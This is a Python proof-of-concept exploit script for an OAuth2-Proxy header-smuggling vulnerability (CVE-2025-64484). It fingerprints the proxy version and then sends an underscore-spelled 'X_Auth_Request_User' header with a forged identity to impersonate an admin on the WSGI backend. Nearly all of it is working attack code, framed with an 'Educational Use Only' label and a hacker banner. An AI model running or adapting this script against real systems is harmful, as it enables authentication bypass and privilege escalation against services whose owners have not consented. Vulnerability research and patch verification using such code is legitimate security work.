#!/usr/bin/env python3
"""
CVE-2025-64484 PoC Exploit
HTTP Header Smuggling via Underscore (_) in OAuth2-Proxy < 7.13.0

Author: SecLabs (Educational Use Only)
Target: OAuth2-Proxy + WSGI backend (Flask, Django, etc.)
"""

import requests
import sys
import argparse
from urllib3 import disable_warnings
disable_warnings()

# === CONFIG ===
BANNER = """
╔══════════════════════════════════════════════════════════╗
║          CVE-2025-64484 - Header Smuggling PoC           ║
║    OAuth2-Proxy < 7.13.0 → Privilege Escalation via _    ║
║          Github : "B1ack4sh" TH3 M4TR1X 5L4Y3R !!!       ║
╚══════════════════════════════════════════════════════════╝
"""

def exploit(target_url, fake_user="admin@pwned.local", verify_ssl=False):
    headers = {
        "X_Auth_Request_User": fake_user,
        "User-Agent": "CVE-2025-64484-PoC"
    }

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Injecting: X_Auth_Request_User: {fake_user}")

    try:
        r = requests.get(target_url, headers=headers, verify=verify_ssl, timeout=10)
        print(f"[+] Status: {r.status_code}")

        if fake_user in r.text:
            print(f"🎯 [EXPLOIT SUCCESS] Authenticated as: {fake_user}")
            print(f"    Response snippet: {r.text[:200]}...")
            return True
        else:
            print("[-] Exploit failed. Header not reflected.")
            print(f"    Response: {r.text[:200]}...")
            return False

    except Exception as e:
        print(f"[!] Request failed: {e}")
        return False


def check_version(proxy_url):
    try:
        r = requests.get(proxy_url, timeout=5)
        server = r.headers.get("Server", "")
        if "oauth2-proxy" in server.lower():
            version = server.split("/")[-1] if "/" in server else "Unknown"
            print(f"[i] Detected OAuth2-Proxy version: {version}")
            if "7.12" in version or int(version.split('.')[0]) < 7:
                print("⚠️  Likely VULNERABLE (< 7.13.0)")
            else:
                print("✅ Probably patched (>= 7.13.0)")
    except:
        print("[!] Could not detect version.")


def main():
    print(BANNER)

    parser = argparse.ArgumentParser(description="CVE-2025-64484 PoC - Header Smuggling")
    parser.add_argument("url", help="Target OAuth2-Proxy URL (e.g. http://localhost:4180/)")
    parser.add_argument("--user", default="admin@pwned.local", help="Fake user to inject")
    parser.add_argument("--nossl", action="store_true", help="Disable SSL verification")

    args = parser.parse_args()

    target = args.url.rstrip("/") + "/"

    # Step 1: Detect version
    check_version(target)

    print("\n" + "="*60)
    # Step 2: Run exploit
    success = exploit(target, args.user, not args.nossl)

    print("\n" + "="*60)
    if success:
        print("🎉 PoC SUCCESS: You bypassed auth via header smuggling!")
    else:
        print("💔 PoC FAILED: System may be patched or misconfigured.")

    print("\nUpgrade to OAuth2-Proxy >= 7.13.0 to fix!")

if __name__ == "__main__":
    main()
